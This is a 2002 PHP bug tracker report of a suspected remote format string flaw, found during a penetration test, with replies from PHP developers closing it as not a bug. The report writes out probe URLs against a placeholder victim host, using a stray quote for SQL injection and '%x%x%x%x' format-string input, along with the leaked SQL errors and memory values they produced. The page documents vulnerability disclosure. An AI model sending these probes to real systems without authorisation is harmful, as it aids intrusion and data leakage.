php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #20124 Remote Format String Bug
Submitted: 2002-10-27 13:04 UTC Modified: 2002-10-27 18:45 UTC
From: mark at ngssoftware dot com Assigned:
Status: Not a bug Package: IIS related
PHP Version: 4.2.3 OS: Win2k
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: mark at ngssoftware dot com
New email:
PHP Version: OS:

 

 [2002-10-27 13:04 UTC] mark at ngssoftware dot com
During a Pentest, I was searching for sql injection, and noticed that PHP returned the following error

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ')'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ')'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510')
 
Indicating SQL injection.  By entering 

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'A

You will notice in that the returned error message shows the 'A

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'A)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near 'A)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'A)
 
To test for the poosibility of a Format String I entered the following

http://victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'%x%x%x%x

You will note from the Error logs that a format string bug is present in Four different fields

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '51275075127680)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near '10081b6e0ffffffffdf1eb0)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'12fbe8cf7124b4a018b46030)
 
This format string bug is NOT dependent on there being SQL injection present.  To get the format string you just have to cause an error example

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510>

This obviously indicates that the Format String is in the Error Handling process.

Regards

Mark Litchfield
www.ngssoftware.com
Tel +44 1241 431367
email: mark@ngssoftware.com

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-10-27 14:24 UTC] sniper@php.net
What exactly you think the bug is here?
And have you read this ever:

http://www.php.net/manual/en/security.cgi-bin.php

 [2002-10-27 18:45 UTC] iliaa@php.net
Sorry, but your problem does not imply a bug in PHP itself.  For a
list of more appropriate places to ask for help using PHP, please
visit http://www.php.net/support.php as this bug system is not the
appropriate forum for asking support questions. 

Thank you for your interest in PHP.

You should validate user passed input before inserting it into your SQL queries.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sun Dec 22 02:01:28 2024 UTC